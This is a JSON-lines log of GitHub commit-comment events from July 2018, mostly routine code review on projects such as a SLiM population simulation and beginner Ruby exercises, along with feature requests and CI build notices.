{"id":"7998033312","type":"CommitCommentEvent","actor":{"login":"elitecodesolutions"},"repo":{"name":"watir/nerodia"},"payload":{"comment":{"id":29786983,"position":null,"line":null,"path":null,"commit_id":"2a7614c39998be1824d32737406892276d8638f5","created_at":"2018-07-21T04:48:44Z","updated_at":"2018-07-21T04:48:44Z","author_association":"NONE","body":"In selenium there is a way to pass the executable path to the driver without using PATH variables. For me this is crucial to having a seamless end user experience. Is this possible in Nerodia?\r\n\r\nwebDriver.Ie(executablepath=“C:\\selenium\\IEServerDriver.exe”)\r\n\r\nIf not, I think it would make a great feature request."}},"created_at":"2018-07-21T04:48:44Z"}
{"id":"7998033459","type":"CommitCommentEvent","actor":{"login":"petrelharp"},"repo":{"name":"jgallowa07/SLiMSimulations"},"payload":{"comment":{"id":29786984,"position":257,"line":257,"path":"MyRecipes1/MyRecipe9_0_0.E","commit_id":"b7968f5f45a5b8bf5d4f09c7c1d916a327507f0e","created_at":"2018-07-21T04:48:55Z","updated_at":"2018-07-21T04:48:55Z","author_association":"COLLABORATOR","body":"instead, we should move them to the nearest lake: something like\r\n```\r\n   lakeIndividuals2.setSpatialPosition = floor(setSpatialPosition) + 0.5;\r\n```"}},"created_at":"2018-07-21T04:48:55Z"}
{"id":"7998035440","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-greekLit"},"payload":{"comment":{"id":29786989,"position":null,"line":null,"path":null,"commit_id":"ccadd2468f3535b6a3a87deda735cdc62a0f6c7a","created_at":"2018-07-21T04:51:06Z","updated_at":"2018-07-21T04:51:06Z","author_association":"NONE","body":"\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-greekLit/4486)*\n"}},"created_at":"2018-07-21T04:51:06Z"}
{"id":"7998036096","type":"CommitCommentEvent","actor":{"login":"petrelharp"},"repo":{"name":"jgallowa07/SLiMSimulations"},"payload":{"comment":{"id":29786990,"position":272,"line":272,"path":"MyRecipes1/MyRecipe9_0_0.E","commit_id":"b7968f5f45a5b8bf5d4f09c7c1d916a327507f0e","created_at":"2018-07-21T04:51:48Z","updated_at":"2018-07-21T04:51:48Z","author_association":"COLLABORATOR","body":"This couldl be significantly faster if only evaluated in the pops we need them in: I think,\r\n```\r\ni1.evalutate(p2);\r\ni2.evaluate(p1);\r\n```\r\n... and need to do\r\n```\r\ni1.evaluate(p3);\r\n```\r\nwhen p3 is around somehow."}},"created_at":"2018-07-21T04:51:48Z"}
{"id":"7998036793","type":"CommitCommentEvent","actor":{"login":"katrinleinweber"},"repo":{"name":"github/opensource.guide"},"payload":{"comment":{"id":29786991,"position":4,"line":11,"path":"_articles/de/metrics.md","commit_id":"87b1c0dfc3065acb648d0afa2dcec3aef2565431","created_at":"2018-07-21T04:52:33Z","updated_at":"2018-07-21T04:52:33Z","author_association":"CONTRIBUTOR","body":"Have you read the entire commit message ;-)"}},"created_at":"2018-07-21T04:52:33Z"}
{"id":"7998037222","type":"CommitCommentEvent","actor":{"login":"Histidine91"},"repo":{"name":"ZeroK-RTS/Zero-K"},"payload":{"comment":{"id":29786992,"position":null,"line":null,"path":null,"commit_id":"d258fd0b542be03e7b5ad060d1c7ed6c9048dea4","created_at":"2018-07-21T04:52:59Z","updated_at":"2018-07-21T04:52:59Z","author_association":"MEMBER","body":"Seems my git client's diff lied to me :|\r\n\r\nWell I tested everything at the time I was doing the dev work it, so should probably be fine."}},"created_at":"2018-07-21T04:52:59Z"}
{"id":"7998039036","type":"CommitCommentEvent","actor":{"login":"petrelharp"},"repo":{"name":"jgallowa07/SLiMSimulations"},"payload":{"comment":{"id":29786995,"position":384,"line":384,"path":"MyRecipes1/MyRecipe9_0_0.E","commit_id":"b7968f5f45a5b8bf5d4f09c7c1d916a327507f0e","created_at":"2018-07-21T04:54:58Z","updated_at":"2018-07-21T04:54:58Z","author_association":"COLLABORATOR","body":"this is now all mutations"}},"created_at":"2018-07-21T04:54:58Z"}
{"id":"7998040973","type":"CommitCommentEvent","actor":{"login":"hnomkeng"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":29786998,"position":28,"line":36,"path":"db/skill_damage_db.txt","commit_id":"a942853d55dd0e96ff98e6c352e2c2a9e000ea86","created_at":"2018-07-21T04:56:58Z","updated_at":"2018-07-21T04:56:58Z","author_association":"NONE","body":"Mob and Boss ?"}},"created_at":"2018-07-21T04:56:58Z"}
{"id":"7998041017","type":"CommitCommentEvent","actor":{"login":"petrelharp"},"repo":{"name":"jgallowa07/SLiMSimulations"},"payload":{"comment":{"id":29786999,"position":432,"line":432,"path":"MyRecipes1/MyRecipe9_0_0.E","commit_id":"b7968f5f45a5b8bf5d4f09c7c1d916a327507f0e","created_at":"2018-07-21T04:57:01Z","updated_at":"2018-07-21T04:57:01Z","author_association":"COLLABORATOR","body":"I suspect you don't need to do these next `fitness(mX)` callbacks, since you override individual fitness anyhow?"}},"created_at":"2018-07-21T04:57:01Z"}
{"id":"7998042583","type":"CommitCommentEvent","actor":{"login":"Benerdchia"},"repo":{"name":"github/opensource.guide"},"payload":{"comment":{"id":29787004,"position":null,"line":null,"path":null,"commit_id":"65b59a4c7b365199e99fca77885deba60e3f68d5","created_at":"2018-07-21T04:58:28Z","updated_at":"2018-07-21T04:58:28Z","author_association":"NONE","body":"#65b59a4"}},"created_at":"2018-07-21T04:58:28Z"}
{"id":"7998044103","type":"CommitCommentEvent","actor":{"login":"petrelharp"},"repo":{"name":"jgallowa07/SLiMSimulations"},"payload":{"comment":{"id":29787007,"position":474,"line":474,"path":"MyRecipes1/MyRecipe9_0_0.E","commit_id":"b7968f5f45a5b8bf5d4f09c7c1d916a327507f0e","created_at":"2018-07-21T04:59:57Z","updated_at":"2018-07-21T04:59:57Z","author_association":"COLLABORATOR","body":"floor(num) + 0.5 would do the same thing as these if statements, right?"}},"created_at":"2018-07-21T04:59:57Z"}
{"id":"7998044270","type":"CommitCommentEvent","actor":{"login":"Murf1954"},"repo":{"name":"mittya/instagram-helper"},"payload":{"comment":{"id":29787010,"position":2,"line":4,"path":"firefox/manifest.json","commit_id":"c864d3cf92dd68a1f7ac48d87b264b1b2f5a13af","created_at":"2018-07-21T05:00:06Z","updated_at":"2018-07-21T05:00:06Z","author_association":"NONE","body":"videos not down loading to desktop all otheres work just not videos"}},"created_at":"2018-07-21T05:00:06Z"}
{"id":"7998044993","type":"CommitCommentEvent","actor":{"login":"grant2258"},"repo":{"name":"libretro/mame2003-plus-libretro"},"payload":{"comment":{"id":29787015,"position":null,"line":null,"path":null,"commit_id":"d4c2b483a9def56c45c56f42091f36171636bd76","created_at":"2018-07-21T05:00:36Z","updated_at":"2018-07-21T05:00:36Z","author_association":"CONTRIBUTOR","body":"well i tried one last fix seems the lib from  https://github.com/libretro/libretro-deps/tree/master/libFLAC are having problems with msvc2010 as well. I put a pull request in if that doesnt fix it ill leave it up to you guys what to do with this because the msvc2010 build is still failing.  http://p.0bl.net/20498 "}},"created_at":"2018-07-21T05:00:36Z"}
{"id":"7998045138","type":"CommitCommentEvent","actor":{"login":"petrelharp"},"repo":{"name":"jgallowa07/SLiMSimulations"},"payload":{"comment":{"id":29787016,"position":515,"line":515,"path":"MyRecipes1/MyRecipe9_0_0.E","commit_id":"b7968f5f45a5b8bf5d4f09c7c1d916a327507f0e","created_at":"2018-07-21T05:00:44Z","updated_at":"2018-07-21T05:00:44Z","author_association":"COLLABORATOR","body":"perhaps record the tree sequence ta this point, too, just in case?"}},"created_at":"2018-07-21T05:00:44Z"}
{"id":"7998045732","type":"CommitCommentEvent","actor":{"login":"petrelharp"},"repo":{"name":"jgallowa07/SLiMSimulations"},"payload":{"comment":{"id":29787017,"position":404,"line":404,"path":"MyRecipes1/MyRecipe9_0_0.E","commit_id":"b7968f5f45a5b8bf5d4f09c7c1d916a327507f0e","created_at":"2018-07-21T05:01:14Z","updated_at":"2018-07-21T05:01:14Z","author_association":"COLLABORATOR","body":"record tree sequence, and remember current set of individuals"}},"created_at":"2018-07-21T05:01:14Z"}
{"id":"7998046750","type":"CommitCommentEvent","actor":{"login":"petrelharp"},"repo":{"name":"jgallowa07/SLiMSimulations"},"payload":{"comment":{"id":29787019,"position":359,"line":359,"path":"MyRecipes1/MyRecipe9_0_0.E","commit_id":"b7968f5f45a5b8bf5d4f09c7c1d916a327507f0e","created_at":"2018-07-21T05:02:07Z","updated_at":"2018-07-21T05:02:07Z","author_association":"COLLABORATOR","body":"this would be cleaner in the final block?"}},"created_at":"2018-07-21T05:02:07Z"}
{"id":"7998049707","type":"CommitCommentEvent","actor":{"login":"Antsmarch"},"repo":{"name":"PaulStoffregen/USBHost_t36"},"payload":{"comment":{"id":29787025,"position":null,"line":null,"path":null,"commit_id":"f890ec19553c40fec140ca0aea33448d3d89032d","created_at":"2018-07-21T05:04:39Z","updated_at":"2018-07-21T05:04:39Z","author_association":"NONE","body":"Doesn't appear there is a bike power profile implemented. Maybe I missed it... If, any plans to develop one?"}},"created_at":"2018-07-21T05:04:39Z"}
{"id":"7998049918","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alxor/tn-ruby"},"payload":{"comment":{"id":29787026,"position":8,"line":30,"path":"tn_01/right_triangle.rb","commit_id":"43096f400db4598d68ba19498b96e48fc0817431","created_at":"2018-07-21T05:04:48Z","updated_at":"2018-07-21T05:04:48Z","author_association":"NONE","body":"не имеет смысла писать код типа\r\n```ruby\r\nb = if a > c\r\n  true\r\nelse\r\n  false\r\nend\r\n```\r\nили\r\n\r\n```ruby\r\nif a > c\r\n  b = true\r\nelse\r\n  b = false\r\nend\r\n```\r\nили через тернарный оператор\r\n\r\n```ruby\r\nb = a > c ? true : false\r\n```\r\n\r\nлюбой из этих вариантов можно заменить вот этим:\r\n```ruby\r\nb = a > c\r\n```\r\nсравнение само по себе будет возвращать булево значение (`true` или `false`), т.к. операторы сравнения возвращают булево значение\r\n\r\n"}},"created_at":"2018-07-21T05:04:48Z"}
{"id":"7998052589","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alxor/tn-ruby"},"payload":{"comment":{"id":29787031,"position":19,"line":38,"path":"tn_01/right_triangle.rb","commit_id":"43096f400db4598d68ba19498b96e48fc0817431","created_at":"2018-07-21T05:07:05Z","updated_at":"2018-07-21T05:07:05Z","author_association":"NONE","body":"уже лучше, чем было )\r\nдавай сделаем еще один шаг к линейному ветвлению, без вложенных проверок\r\nздесь это сделать несложно, а значит лучше сделать, т.к. линейное ветвление всегда предпочтительней ветвления с вложенными условиями"}},"created_at":"2018-07-21T05:07:05Z"}
{"id":"7998053587","type":"CommitCommentEvent","actor":{"login":"yungsters"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29787032,"position":null,"line":null,"path":null,"commit_id":"6110a4cc75bf8f285ff091cc175b9ebf737f88fc","created_at":"2018-07-21T05:08:01Z","updated_at":"2018-07-21T05:08:01Z","author_association":"CONTRIBUTOR","body":"Yes."}},"created_at":"2018-07-21T05:08:01Z"}
{"id":"7998054796","type":"CommitCommentEvent","actor":{"login":"Matrix00779"},"repo":{"name":"Matrix00779/Matrix00779.github.io"},"payload":{"comment":{"id":29787035,"position":null,"line":null,"path":null,"commit_id":"7ec38d87d871075ecc3e92f7072535c9ae8d2eb3","created_at":"2018-07-21T05:08:59Z","updated_at":"2018-07-21T05:08:59Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-21T05:08:59Z"}
{"id":"7998056787","type":"CommitCommentEvent","actor":{"login":"nschneid"},"repo":{"name":"nert-gu/Xposition"},"payload":{"comment":{"id":29787037,"position":null,"line":null,"path":null,"commit_id":"eefbdd5b34437aeee9f4a903bbfb532914205d2c","created_at":"2018-07-21T05:10:50Z","updated_at":"2018-07-21T05:10:50Z","author_association":"CONTRIBUTOR","body":"Remove the print call? :)\r\n\r\nAren't the article title and slug different things?"}},"created_at":"2018-07-21T05:10:50Z"}
{"id":"7998060196","type":"CommitCommentEvent","actor":{"login":"1Bennell"},"repo":{"name":"brettcannon/vibora"},"payload":{"comment":{"id":29787047,"position":6,"line":6,"path":".gitbook.yaml","commit_id":"9cfb6c0a38c1fcbaadc5ebf46dd2204fa44cec48","created_at":"2018-07-21T05:14:02Z","updated_at":"2018-07-21T05:14:02Z","author_association":"NONE","body":"Redirects/page"}},"created_at":"2018-07-21T05:14:02Z"}
{"id":"7998061344","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alxor/tn-ruby"},"payload":{"comment":{"id":29787051,"position":19,"line":38,"path":"tn_01/right_triangle.rb","commit_id":"43096f400db4598d68ba19498b96e48fc0817431","created_at":"2018-07-21T05:15:08Z","updated_at":"2018-07-21T05:15:08Z","author_association":"NONE","body":"по сути в ТЗ явно оговорены 3 случая:\r\n- \"...является ли треугольник прямоугольным...\"\r\n- \"Также, если треугольник является при этом равнобедренным...\"\r\n- \"Если все 3 стороны равны, то треугольник... равносторонний, но не прямоугольный.\"\r\n\r\nможно еще добавить 4-ый вариант: \"не прямоугольный и не равносторонний\"\r\n(5-м вариантом вполне можно проверитть может ли он вообще существовать с заданными длинами сторон, но давай не будем усложнять)\r\n\r\nесли посмотреть на твой блок (32 - 38 строки), то у тебя в нем как раз эти четыре условия, т.е. четыре ветви и проверяются\r\n\r\nтолько у тебя реализовано с двумя вложенными проверками, при этом все эти условия можно записать в одном линейном блоке\r\n\r\nпопробуй написать линейно, если будут вопросы - пиши"}},"created_at":"2018-07-21T05:15:08Z"}
{"id":"7998061955","type":"CommitCommentEvent","actor":{"login":"Sumitprakashmishra"},"repo":{"name":"Sumitprakashmishra/GitTutorial"},"payload":{"comment":{"id":29787055,"position":null,"line":null,"path":null,"commit_id":"5bde31900a9c3e1ef9ddbe898050e2d1ff3ebc2e","created_at":"2018-07-21T05:15:43Z","updated_at":"2018-07-21T05:15:43Z","author_association":"OWNER","body":"Only testing commit"}},"created_at":"2018-07-21T05:15:43Z"}
{"id":"7998065327","type":"CommitCommentEvent","actor":{"login":"koolkarniatul"},"repo":{"name":"koolkarniatul/Opulence_Technosoft"},"payload":{"comment":{"id":29787057,"position":null,"line":null,"path":null,"commit_id":"7a7848aaa7752830074d8260d1a617ed8c5fedcf","created_at":"2018-07-21T05:18:55Z","updated_at":"2018-07-21T05:18:55Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-21T05:18:55Z"}
{"id":"7998065790","type":"CommitCommentEvent","actor":{"login":"akuckartz"},"repo":{"name":"coralproject/talk"},"payload":{"comment":{"id":29787058,"position":null,"line":null,"path":null,"commit_id":"8ee90387f689b5eba29cc1ed24a2304a8c100e8e","created_at":"2018-07-21T05:19:23Z","updated_at":"2018-07-21T05:19:23Z","author_association":"NONE","body":":+1:"}},"created_at":"2018-07-21T05:19:23Z"}
{"id":"7998066355","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29787059,"position":null,"line":null,"path":null,"commit_id":"b610295505df1ba95ce79cfc5cd43a92730b6b5a","created_at":"2018-07-21T05:20:00Z","updated_at":"2018-07-21T05:20:00Z","author_association":"NONE","body":"159125973_Issue#6843 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2985 of 2985 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b610295505df1ba95ce79cfc5cd43a92730b6b5a-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b610295505df1ba95ce79cfc5cd43a92730b6b5a-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-21T05:20:00Z"}
{"id":"7998066900","type":"CommitCommentEvent","actor":{"login":"tkrajina"},"repo":{"name":"raceresult/gpxgo"},"payload":{"comment":{"id":29787060,"position":6,"line":427,"path":"gpx/converters.go","commit_id":"dfd674473b91c9900b1a9ac54452e180292b7bf4","created_at":"2018-07-21T05:20:27Z","updated_at":"2018-07-21T05:20:27Z","author_association":"NONE","body":"Yes, I commented on this one because it's a bug. I went through the other changes and it all makes sense. At the time when I first wrote this I was a total newbie in Golang, let's fix this dark part of my history :)\r\n\r\nAnyway, I made a few changes on top of your commits, they are here https://github.com/tkrajina/gpxgo/tree/raceresult-master . But if you want, just proceed in making a PR, and I'll then rebase my stuff after the merge. "}},"created_at":"2018-07-21T05:20:27Z"}
{"id":"7998068620","type":"CommitCommentEvent","actor":{"login":"rtholmes"},"repo":{"name":"ubccpsc/classy"},"payload":{"comment":{"id":29787068,"position":null,"line":null,"path":null,"commit_id":"0e79bb7a45e417018d0cc0339b00fa71993d1c85","created_at":"2018-07-21T05:22:10Z","updated_at":"2018-07-21T05:22:10Z","author_association":"CONTRIBUTOR","body":"Was supposed to say 'See #38; more auth simplification'"}},"created_at":"2018-07-21T05:22:10Z"}
{"id":"7998077222","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29787085,"position":null,"line":null,"path":null,"commit_id":"0c3fea26b8f2a85957a9a070c5db84afb83361f8","created_at":"2018-07-21T05:29:59Z","updated_at":"2018-07-21T05:29:59Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.362`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/406519295) :tada:"}},"created_at":"2018-07-21T05:29:59Z"}
{"id":"7998078558","type":"CommitCommentEvent","actor":{"login":"ch4bes"},"repo":{"name":"ch4bes/poolPal"},"payload":{"comment":{"id":29787091,"position":null,"line":null,"path":null,"commit_id":"58c1caa2937d7b3a81d37659082dc4829fda3958","created_at":"2018-07-21T05:31:13Z","updated_at":"2018-07-21T05:31:13Z","author_association":"OWNER","body":"Commit message refers to [this commit](https://github.com/ch4bes/poolPal/commit/9ae26103bce2564620b8d5ffc4661ce12d46dfc6)"}},"created_at":"2018-07-21T05:31:13Z"}
{"id":"7998078843","type":"CommitCommentEvent","actor":{"login":"darktoes"},"repo":{"name":"CleverRaven/Cataclysm-DDA"},"payload":{"comment":{"id":29787092,"position":null,"line":null,"path":null,"commit_id":"047985163f48931ea69ff39025fc34840ed18afe","created_at":"2018-07-21T05:31:30Z","updated_at":"2018-07-21T05:31:30Z","author_association":"NONE","body":"Forgot to mention, also added an AP and accuracy based version of metal arrows."}},"created_at":"2018-07-21T05:31:30Z"}
{"id":"7998082257","type":"CommitCommentEvent","actor":{"login":"tomtor"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":29787097,"position":null,"line":null,"path":null,"commit_id":"baceb8693d268c14bea7cdbe419d9d434f26c95c","created_at":"2018-07-21T05:35:15Z","updated_at":"2018-07-21T05:35:15Z","author_association":"NONE","body":"Congratulations!"}},"created_at":"2018-07-21T05:35:15Z"}
{"id":"7998083888","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29787099,"position":null,"line":null,"path":null,"commit_id":"8064b62c0d33b1b283e0f04b5be24ec6dde1b4f4","created_at":"2018-07-21T05:37:02Z","updated_at":"2018-07-21T05:37:02Z","author_association":"NONE","body":"лучше все же придерживаться именований файлов на английском языке )\r\nэто как-то общепринято, ну и просто надежней, т.к. код обычно заточен именно под то, что все именования на английском, т.е. код может просто в каких-то случаях не работать, если давать имена на любом языке отличном от английского"}},"created_at":"2018-07-21T05:37:02Z"}
{"id":"7998085487","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29787104,"position":4,"line":4,"path":"Lesson_1/Идеальный_вес.rb","commit_id":"8064b62c0d33b1b283e0f04b5be24ec6dde1b4f4","created_at":"2018-07-21T05:38:50Z","updated_at":"2018-07-21T05:38:50Z","author_association":"NONE","body":"там где используется `to_i` (или `to_f`) вызов `chomp` (`strip`) не нужен, т.к. `to_i` (или `to_f`) \"все сделает сам\"\r\n"}},"created_at":"2018-07-21T05:38:50Z"}
{"id":"7998085580","type":"CommitCommentEvent","actor":{"login":"schillic"},"repo":{"name":"ultimate-pa/ultimate"},"payload":{"comment":{"id":29787105,"position":15,"line":87,"path":"trunk/source/TraceAbstraction/src/de/uni_freiburg/informatik/ultimate/plugins/generator/traceabstraction/interpolantautomata/builders/StraightLineInterpolantAutomatonBuilder.java","commit_id":"71425fa78ea5d0251f9c7ea3b1a4826a3846cde3","created_at":"2018-07-21T05:38:56Z","updated_at":"2018-07-21T05:38:56Z","author_association":"MEMBER","body":"@Heizmann: Apparently I misinterpreted the code. I agree to remove wrong documentation. But now we are back to square one, and another developer might misinterpret the same code again. Unless one can prove that every future developer is strictly smarter than me, it would be even better to add a correct documentation now."}},"created_at":"2018-07-21T05:38:56Z"}
{"id":"7998085777","type":"CommitCommentEvent","actor":{"login":"brandoconnor"},"repo":{"name":"bypasslane/terraform-aws-eks"},"payload":{"comment":{"id":29787106,"position":null,"line":null,"path":null,"commit_id":"fc6141f397a62802df692e2682ae09825d29aa95","created_at":"2018-07-21T05:39:12Z","updated_at":"2018-07-21T05:39:12Z","author_association":"NONE","body":"Feel free to PR this back to the main repo when you have a chance. 👍 "}},"created_at":"2018-07-21T05:39:12Z"}
{"id":"7998086123","type":"CommitCommentEvent","actor":{"login":"pjotrp"},"repo":{"name":"brainstorm/sambamba"},"payload":{"comment":{"id":29787108,"position":null,"line":null,"path":null,"commit_id":"d3b21a57516ac502978c03d882075d3bcb11aa31","created_at":"2018-07-21T05:39:35Z","updated_at":"2018-07-21T05:39:35Z","author_association":"NONE","body":"According to this htslib should work https://github.com/biod/sambamba/issues/280. But it may need some tweaking. I should get time to fix sambamba in August/September. Sorry about the delay."}},"created_at":"2018-07-21T05:39:35Z"}
{"id":"7998086238","type":"CommitCommentEvent","actor":{"login":"juribeparada"},"repo":{"name":"juribeparada/MMDVM_HS"},"payload":{"comment":{"id":29787110,"position":null,"line":null,"path":null,"commit_id":"46ba5cc4f74d072aa545fd54fc5b64bb473e65bd","created_at":"2018-07-21T05:39:42Z","updated_at":"2018-07-21T05:39:42Z","author_association":"OWNER","body":"OK, that is very good news. I am going to build a binary release soon. Thank you for all the tests also."}},"created_at":"2018-07-21T05:39:42Z"}
{"id":"7998086661","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29787112,"position":11,"line":11,"path":"Lesson_1/Идеальный_вес.rb","commit_id":"8064b62c0d33b1b283e0f04b5be24ec6dde1b4f4","created_at":"2018-07-21T05:40:08Z","updated_at":"2018-07-21T05:40:08Z","author_association":"NONE","body":"здесь и далее везде:\r\nнайди для своего редактора автодобавление пустой строки в конце файла, чтобы не было красной стрелки на ГитХабе и вручную не приходилось добавлять строки в каждом файле\r\n\r\n"}},"created_at":"2018-07-21T05:40:08Z"}
{"id":"7998087185","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29787113,"position":8,"line":8,"path":"Lesson_1/Квадратное_уравнение.rb","commit_id":"8064b62c0d33b1b283e0f04b5be24ec6dde1b4f4","created_at":"2018-07-21T05:40:36Z","updated_at":"2018-07-21T05:40:36Z","author_association":"NONE","body":"скобки не нужны"}},"created_at":"2018-07-21T05:40:36Z"}
{"id":"7998087495","type":"CommitCommentEvent","actor":{"login":"PiCob"},"repo":{"name":"signalapp/Signal-Android"},"payload":{"comment":{"id":29787114,"position":null,"line":null,"path":null,"commit_id":"6a090bd5f1d78ee1cf144a93644f4ddb93a5ab83","created_at":"2018-07-21T05:40:59Z","updated_at":"2018-07-21T05:40:59Z","author_association":"NONE","body":"It seems that the compose text height still doesn't match send button height (the send button is quite a bit smaller). This is on Android 4.4.4."}},"created_at":"2018-07-21T05:40:59Z"}
{"id":"7998090576","type":"CommitCommentEvent","actor":{"login":"enggmind"},"repo":{"name":"rudreshrm05/sample-codes"},"payload":{"comment":{"id":29787118,"position":44,"line":44,"path":"demo_main_file.py","commit_id":"1b9d25e59f92b2c2711830961bb7cd09a5b7b04d","created_at":"2018-07-21T05:44:09Z","updated_at":"2018-07-21T05:44:09Z","author_association":"NONE","body":"let all these functions take argument, like this should take the argument of the listname it is supposed to create"}},"created_at":"2018-07-21T05:44:09Z"}
{"id":"7998090957","type":"CommitCommentEvent","actor":{"login":"enggmind"},"repo":{"name":"rudreshrm05/sample-codes"},"payload":{"comment":{"id":29787120,"position":51,"line":51,"path":"demo_main_file.py","commit_id":"1b9d25e59f92b2c2711830961bb7cd09a5b7b04d","created_at":"2018-07-21T05:44:33Z","updated_at":"2018-07-21T05:44:33Z","author_association":"NONE","body":"same here, what is the listname it is checking if it exists"}},"created_at":"2018-07-21T05:44:33Z"}
{"id":"7998091336","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29787121,"position":20,"line":20,"path":"Lesson_1/Квадратное_уравнение.rb","commit_id":"8064b62c0d33b1b283e0f04b5be24ec6dde1b4f4","created_at":"2018-07-21T05:44:55Z","updated_at":"2018-07-21T05:44:55Z","author_association":"NONE","body":"правильное решение, но нужно сделать одну небольшую оптимизацию\r\nу тебя сейчас даже если первая проверка \"тру\" все равно выполнится вторая проверка, а потом третья\r\nэто неверно в данном случае, потому что мы имеем взаимоисключающие проверки\r\nесли одно условие выполнилось, то остальные уже точно \"фолс\"\r\n\r\nпоэтому будет правильно все три проверки собрать в один \"иф-элсиф-элс\" блок, в таком случае после выполнения любого из условий дальнейших проверок уже не будет и это будет правильно"}},"created_at":"2018-07-21T05:44:55Z"}
{"id":"7998093487","type":"CommitCommentEvent","actor":{"login":"enggmind"},"repo":{"name":"rudreshrm05/sample-codes"},"payload":{"comment":{"id":29787127,"position":56,"line":56,"path":"demo_main_file.py","commit_id":"1b9d25e59f92b2c2711830961bb7cd09a5b7b04d","created_at":"2018-07-21T05:47:08Z","updated_at":"2018-07-21T05:47:08Z","author_association":"NONE","body":"here you are essentially going through all the lists and checking if a particular list exists, this logic is similar to get_boardid logic, either use similar code in get_boardid or use get_boardid logic here. we need homogeneity. \r\n"}},"created_at":"2018-07-21T05:47:08Z"}
{"id":"7998094917","type":"CommitCommentEvent","actor":{"login":"imacubsfan23"},"repo":{"name":"imacubsfan23/plots2"},"payload":{"comment":{"id":29787310,"position":null,"line":null,"path":null,"commit_id":"d4e1cfd9d2602745a58a99d81bc6b045d786fac2","created_at":"2018-07-21T05:48:28Z","updated_at":"2018-07-21T05:48:28Z","author_association":"OWNER","body":"Do you want me to go ahead and do that? or does souravirus need to respond first?\r\n"}},"created_at":"2018-07-21T05:48:28Z"}
{"id":"7998095490","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"MinecraftForge/MCPConfig"},"payload":{"comment":{"id":29787313,"position":8,"line":14,"path":"versions/1.13/config.json","commit_id":"50ffa321d46955725ac8b3c30820e885aaa2ec8b","created_at":"2018-07-21T05:49:05Z","updated_at":"2018-07-21T05:49:05Z","author_association":"NONE","body":"Didn't mojang switch to jetbrains annotations?"}},"created_at":"2018-07-21T05:49:05Z"}
{"id":"7998097033","type":"CommitCommentEvent","actor":{"login":"schillic"},"repo":{"name":"ultimate-pa/ultimate"},"payload":{"comment":{"id":29787314,"position":18,"line":51,"path":"trunk/source/Library-Automata/src/de/uni_freiburg/informatik/ultimate/automata/petrinet/IsEquivalent.java","commit_id":"4f9cda2f1993f44d50d384e0399314b6eb332211","created_at":"2018-07-21T05:50:35Z","updated_at":"2018-07-21T05:50:35Z","author_association":"MEMBER","body":"@Heizmann: I think the main reason that we use one state factory with different interfaces is that the AutomataScriptInterpreter needs it like that. Splitting the state factory will break the support."}},"created_at":"2018-07-21T05:50:35Z"}
{"id":"7998098886","type":"CommitCommentEvent","actor":{"login":"Ningsir"},"repo":{"name":"Ningsir/tankwar"},"payload":{"comment":{"id":29787319,"position":null,"line":null,"path":null,"commit_id":"9033cfeae1569c5e311749c4acca6dd8ae8f9fb9","created_at":"2018-07-21T05:52:19Z","updated_at":"2018-07-21T05:52:19Z","author_association":"OWNER","body":"\r\n![](https://github.com/Ningsir/tankwar/blob/master/game_map.PNG)\r\n\r\n![](https://github.com/Ningsir/tankwar/blob/master/start_game.PNG)\r\n"}},"created_at":"2018-07-21T05:52:19Z"}
{"id":"7998100368","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29787326,"position":2,"line":2,"path":"Lesson_1/Площадь_треугольника.rb","commit_id":"8064b62c0d33b1b283e0f04b5be24ec6dde1b4f4","created_at":"2018-07-21T05:53:54Z","updated_at":"2018-07-21T05:53:54Z","author_association":"NONE","body":"рекомендуется давать переменным \"говорящие\" имена, чтобы впоследствии было проще читать и понимать код\r\nк примеру данную переменную можно было бы назвать `base`\r\n"}},"created_at":"2018-07-21T05:53:54Z"}
